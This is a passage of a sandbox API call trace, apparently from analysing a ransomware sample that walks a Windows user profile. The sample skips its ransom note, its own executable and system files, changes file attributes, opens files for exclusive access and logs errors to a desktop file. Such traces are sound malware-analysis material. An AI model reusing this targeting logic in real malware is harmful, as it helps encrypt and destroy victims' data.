cFileName="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0048.185] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.185] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.185] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", lpString2="Rabbit4444.exe") returned -1 [0048.185] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", lpString2=".") returned 1 [0048.185] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", lpString2="..") returned 1 [0048.185] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", lpString2="windows") returned -1 [0048.185] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", lpString2="bootmgr") returned 1 [0048.185] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", lpString2="pagefile.sys") returned -1 [0048.185] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", lpString2="boot") returned 1 [0048.185] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", lpString2="ids.txt") returned 1 [0048.185] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", lpString2="NTUSER.DAT") returned 1 [0048.185] lstrcpyW (in: lpString1=0x130eb58, lpString2="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf" | out: lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf") returned="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf" [0048.185] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", dwFileAttributes=0x22) returned 1 [0048.186] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", dwFileAttributes=0x6) returned 1 [0048.186] lstrlenW (lpString="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf") returned 55 [0048.186] lstrlenW (lpString="Rabbit4444") returned 10 [0048.186] lstrcmpiW (lpString1="9b}.TM.blf", lpString2="Rabbit4444") returned -1 [0048.186] lstrlenW (lpString=".dll") returned 4 [0048.186] lstrcmpiW (lpString1=".blf", lpString2=".dll") returned -1 [0048.186] lstrlenW (lpString=".lnk") returned 4 [0048.186] lstrcmpiW (lpString1=".blf", lpString2=".lnk") returned -1 [0048.186] lstrlenW (lpString=".ini") returned 4 [0048.186] lstrcmpiW (lpString1=".blf", lpString2=".ini") returned -1 [0048.186] lstrlenW (lpString=".sys") returned 4 [0048.186] lstrcmpiW (lpString1=".blf", lpString2=".sys") returned -1 [0048.186] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf" (normalized: "c:\\users\\fd1hvy\\ntuser.dat{fae9930d-933c-11e7-a51d-b808901d6c9b}.tm.blf"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0xffffffff [0048.186] GetLastError () returned 0x20 [0048.187] wsprintfA (in: param_1=0x130d2c8, param_2="[ERROR] %S _CreateFile error %i\r\n" | out: param_1="[ERROR] C:\\Users\\FD1HVy\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf _CreateFile error 32\r\n") returned 102 [0048.187] lstrlenA (lpString="[ERROR] C:\\Users\\FD1HVy\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf _CreateFile error 32\r\n") returned 102 [0048.187] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.187] SetFilePointer (in: hFile=0x278, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0048.187] WriteFile (in: hFile=0x278, lpBuffer=0x130d2c8*, nNumberOfBytesToWrite=0x66, lpNumberOfBytesWritten=0x130bf8c, lpOverlapped=0x0 | out: lpBuffer=0x130d2c8*, lpNumberOfBytesWritten=0x130bf8c*=0x66, lpOverlapped=0x0) returned 1 [0048.189] CloseHandle (hObject=0x278) returned 1 [0048.190] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0048.190] CloseHandle (hObject=0x0) returned 0 [0048.190] CloseHandle (hObject=0xffffffff) returned 1 [0048.190] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2122a949, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x2122a949, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x4edc6408, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0048.190] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.190] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.190] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", lpString2="Rabbit4444.exe") returned -1 [0048.190] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", lpString2=".") returned 1 [0048.190] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", lpString2="..") returned 1 [0048.190] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", lpString2="windows") returned -1 [0048.190] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", lpString2="bootmgr") returned 1 [0048.190] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", lpString2="pagefile.sys") returned -1 [0048.190] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", lpString2="boot") returned 1 [0048.190] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", lpString2="ids.txt") returned 1 [0048.190] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", lpString2="NTUSER.DAT") returned 1 [0048.190] lstrcpyW (in: lpString1=0x130eb58, lpString2="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms" | out: lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms") returned="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms" [0048.190] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", dwFileAttributes=0x22) returned 1 [0048.191] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", dwFileAttributes=0x6) returned 1 [0048.191] lstrlenW (lpString="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms") returned 92 [0048.191] lstrlenW (lpString="Rabbit4444") returned 10 [0048.191] lstrcmpiW (lpString1="egtrans-ms", lpString2="Rabbit4444") returned -1 [0048.191] lstrlenW (lpString=".dll") returned 4 [0048.191] lstrcmpiW (lpString1="s-ms", lpString2=".dll") returned 1 [0048.191] lstrlenW (lpString=".lnk") returned 4 [0048.191] lstrcmpiW (lpString1="s-ms", lpString2=".lnk") returned 1 [0048.191] lstrlenW (lpString=".ini") returned 4 [0048.191] lstrcmpiW (lpString1="s-ms", lpString2=".ini") returned 1 [0048.191] lstrlenW (lpString=".sys") returned 4 [0048.191] lstrcmpiW (lpString1="s-ms", lpString2=".sys") returned 1 [0048.191] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\fd1hvy\\ntuser.dat{fae9930d-933c-11e7-a51d-b808901d6c9b}.tmcontainer00000000000000000001.regtrans-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0xffffffff [0048.191] GetLastError () returned 0x20 [0048.191] wsprintfA (in: param_1=0x130d2c8, param_2="[ERROR] %S _CreateFile error %i\r\n" | out: param_1="[ERROR] C:\\Users\\FD1HVy\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms _CreateFile error 32\r\n") returned 139 [0048.191] lstrlenA (lpString="[ERROR] C:\\Users\\FD1HVy\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms _CreateFile error 32\r\n") returned 139 [0048.191] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.192] SetFilePointer (in: hFile=0x278, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x6c0 [0048.192] WriteFile (in: hFile=0x278, lpBuffer=0x130d2c8*, nNumberOfBytesToWrite=0x8b, lpNumberOfBytesWritten=0x130bf8c, lpOverlapped=0x0 | out: lpBuffer=0x130d2c8*, lpNumberOfBytesWritten=0x130bf8c*=0x8b, lpOverlapped=0x0) returned 1 [0048.193] CloseHandle (hObject=0x278) returned 1 [0048.194] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0048.194] CloseHandle (hObject=0x0) returned 0 [0048.194] CloseHandle (hObject=0xffffffff) returned 1 [0048.194] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2122a949, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x2122a949, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x4edc6408, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0048.194] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.194] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.194] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", lpString2="Rabbit4444.exe") returned -1 [0048.194] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", lpString2=".") returned 1 [0048.194] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", lpString2="..") returned 1 [0048.194] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", lpString2="windows") returned -1 [0048.194] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", lpString2="bootmgr") returned 1 [0048.194] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", lpString2="pagefile.sys") returned -1 [0048.194] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", lpString2="boot") returned 1 [0048.194] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", lpString2="ids.txt") returned 1 [0048.194] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", lpString2="NTUSER.DAT") returned 1 [0048.194] lstrcpyW (in: lpString1=0x130eb58, lpString2="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms" | out: lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms") returned="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms" [0048.194] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", dwFileAttributes=0x22) returned 1 [0048.195] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", dwFileAttributes=0x6) returned 1 [0048.195] lstrlenW (lpString="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms") returned 92 [0048.195] lstrlenW (lpString="Rabbit4444") returned 10 [0048.195] lstrcmpiW (lpString1="egtrans-ms", lpString2="Rabbit4444") returned -1 [0048.195] lstrlenW (lpString=".dll") returned 4 [0048.195] lstrcmpiW (lpString1="s-ms", lpString2=".dll") returned 1 [0048.195] lstrlenW (lpString=".lnk") returned 4 [0048.195] lstrcmpiW (lpString1="s-ms", lpString2=".lnk") returned 1 [0048.195] lstrlenW (lpString=".ini") returned 4 [0048.195] lstrcmpiW (lpString1="s-ms", lpString2=".ini") returned 1 [0048.195] lstrlenW (lpString=".sys") returned 4 [0048.195] lstrcmpiW (lpString1="s-ms", lpString2=".sys") returned 1 [0048.195] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\fd1hvy\\ntuser.dat{fae9930d-933c-11e7-a51d-b808901d6c9b}.tmcontainer00000000000000000002.regtrans-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0xffffffff [0048.195] GetLastError () returned 0x20 [0048.195] wsprintfA (in: param_1=0x130d2c8, param_2="[ERROR] %S _CreateFile error %i\r\n" | out: param_1="[ERROR] C:\\Users\\FD1HVy\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms _CreateFile error 32\r\n") returned 139 [0048.195] lstrlenA (lpString="[ERROR] C:\\Users\\FD1HVy\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms _CreateFile error 32\r\n") returned 139 [0048.195] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.195] SetFilePointer (in: hFile=0x278, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x74b [0048.196] WriteFile (in: hFile=0x278, lpBuffer=0x130d2c8*, nNumberOfBytesToWrite=0x8b, lpNumberOfBytesWritten=0x130bf8c, lpOverlapped=0x0 | out: lpBuffer=0x130d2c8*, lpNumberOfBytesWritten=0x130bf8c*=0x8b, lpOverlapped=0x0) returned 1 [0048.197] CloseHandle (hObject=0x278) returned 1 [0048.198] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0048.198] CloseHandle (hObject=0x0) returned 0 [0048.198] CloseHandle (hObject=0xffffffff) returned 1 [0048.198] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xc1adea7d, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xc1adea7d, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xc1adea7d, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0048.198] lstrcmpiW (lpString1="ntuser.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.198] lstrcmpiW (lpString1="ntuser.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.198] lstrcmpiW (lpString1="ntuser.ini", lpString2="Rabbit4444.exe") returned -1 [0048.198] lstrcmpiW (lpString1="ntuser.ini", lpString2=".") returned 1 [0048.198] lstrcmpiW (lpString1="ntuser.ini", lpString2="..") returned 1 [0048.198] lstrcmpiW (lpString1="ntuser.ini", lpString2="windows") returned -1 [0048.198] lstrcmpiW (lpString1="ntuser.ini", lpString2="bootmgr") returned 1 [0048.198] lstrcmpiW (lpString1="ntuser.ini", lpString2="pagefile.sys") returned -1 [0048.198] lstrcmpiW (lpString1="ntuser.ini", lpString2="boot") returned 1 [0048.198] lstrcmpiW (lpString1="ntuser.ini", lpString2="ids.txt") returned 1 [0048.198] lstrcmpiW (lpString1="ntuser.ini", lpString2="NTUSER.DAT") returned 1 [0048.198] lstrcpyW (in: lpString1=0x130eb58, lpString2="ntuser.ini" | out: lpString1="ntuser.ini") returned="ntuser.ini" [0048.198] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\ntuser.ini", dwFileAttributes=0x2) returned 1 [0048.199] lstrlenW (lpString="ntuser.ini") returned 10 [0048.199] lstrlenW (lpString="Rabbit4444") returned 10 [0048.199] lstrcmpiW (lpString1="ntuser.ini", lpString2="Rabbit4444") returned -1 [0048.199] lstrlenW (lpString=".dll") returned 4 [0048.199] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0048.199] lstrlenW (lpString=".lnk") returned 4 [0048.199] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0048.199] lstrlenW (lpString=".ini") returned 4 [0048.199] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0048.199] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3f0f0bc5, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd4516574, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x94022772, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OneDrive", cAlternateFileName="")) returned 1 [0048.199] lstrcmpiW (lpString1="OneDrive", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.199] lstrcmpiW (lpString1="OneDrive", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.199] lstrcmpiW (lpString1="OneDrive", lpString2="Rabbit4444.exe") returned -1 [0048.199] lstrcmpiW (lpString1="OneDrive", lpString2=".") returned 1 [0048.199] lstrcmpiW (lpString1="OneDrive", lpString2="..") returned 1 [0048.199] lstrcmpiW (lpString1="OneDrive", lpString2="windows") returned -1 [0048.199] lstrcmpiW (lpString1="OneDrive", lpString2="bootmgr") returned 1 [0048.199] lstrcmpiW (lpString1="OneDrive", lpString2="pagefile.sys") returned -1 [0048.199] lstrcmpiW (lpString1="OneDrive", lpString2="boot") returned 1 [0048.199] lstrcmpiW (lpString1="OneDrive", lpString2="ids.txt") returned 1 [0048.199] lstrcmpiW (lpString1="OneDrive", lpString2="NTUSER.DAT") returned 1 [0048.199] lstrcpyW (in: lpString1=0x130eb58, lpString2="OneDrive" | out: lpString1="OneDrive") returned="OneDrive" [0048.199] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\OneDrive", dwFileAttributes=0x10) returned 1 [0048.200] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6388 [0048.200] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x32) returned 0x102810 [0048.200] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6390 | out: ListHead=0xf68b0, ListEntry=0xf6390) returned 0xf6430 [0048.200] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xcd4ccbd8, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xcd4ccbd8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0048.200] lstrcmpiW (lpString1="Pictures", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.200] lstrcmpiW (lpString1="Pictures", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.200] lstrcmpiW (lpString1="Pictures", lpString2="Rabbit4444.exe") returned -1 [0048.200] lstrcmpiW (lpString1="Pictures", lpString2=".") returned 1 [0048.200] lstrcmpiW (lpString1="Pictures", lpString2="..") returned 1 [0048.200] lstrcmpiW (lpString1="Pictures", lpString2="windows") returned -1 [0048.200] lstrcmpiW (lpString1="Pictures", lpString2="bootmgr") returned 1 [0048.200] lstrcmpiW (lpString1="Pictures", lpString2="pagefile.sys") returned 1 [0048.200] lstrcmpiW (lpString1="Pictures", lpString2="boot") returned 1 [0048.200] lstrcmpiW (lpString1="Pictures", lpString2="ids.txt") returned 1 [0048.200] lstrcmpiW (lpString1="Pictures", lpString2="NTUSER.DAT") returned 1 [0048.200] lstrcpyW (in: lpString1=0x130eb58, lpString2="Pictures" | out: lpString1="Pictures") returned="Pictures" [0048.200] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures", dwFileAttributes=0x10) returned 1 [0048.200] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf63a8 [0048.200] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x32) returned 0x102990 [0048.200] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf63b0 | out: ListHead=0xf68b0, ListEntry=0xf63b0) returned 0xf6390 [0048.200] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0048.200] lstrcmpiW (lpString1="PrintHood", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.200] lstrcmpiW (lpString1="PrintHood", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.200] lstrcmpiW (lpString1="PrintHood", lpString2="Rabbit4444.exe") returned -1 [0048.200] lstrcmpiW (lpString1="PrintHood", lpString2=".") returned 1 [0048.200] lstrcmpiW (lpString1="PrintHood", lpString2="..") returned 1 [0048.200] lstrcmpiW (lpString1="PrintHood", lpString2="windows") returned -1 [0048.200] lstrcmpiW (lpString1="PrintHood", lpString2="bootmgr") returned 1 [0048.201] lstrcmpiW (lpString1="PrintHood", lpString2="pagefile.sys") returned 1 [0048.201] lstrcmpiW (lpString1="PrintHood", lpString2="boot") returned 1 [0048.201] lstrcmpiW (lpString1="PrintHood", lpString2="ids.txt") returned 1 [0048.201] lstrcmpiW (lpString1="PrintHood", lpString2="NTUSER.DAT") returned 1 [0048.201] lstrcpyW (in: lpString1=0x130eb58, lpString2="PrintHood" | out: lpString1="PrintHood") returned="PrintHood" [0048.201] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\PrintHood", dwFileAttributes=0x2412) returned 1 [0048.201] wsprintfA (in: param_1=0x130e338, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\PrintHood\r\n") returned 44 [0048.201] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\PrintHood\r\n") returned 44 [0048.201] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.201] SetFilePointer (in: hFile=0x278, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0048.201] WriteFile (in: hFile=0x278, lpBuffer=0x130e338*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x130daf4, lpOverlapped=0x0 | out: lpBuffer=0x130e338*, lpNumberOfBytesWritten=0x130daf4*=0x2c, lpOverlapped=0x0) returned 1 [0048.203] CloseHandle (hObject=0x278) returned 1 [0048.204] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0048.204] lstrcmpiW (lpString1="Recent", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.204] lstrcmpiW (lpString1="Recent", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.204] lstrcmpiW (lpString1="Recent", 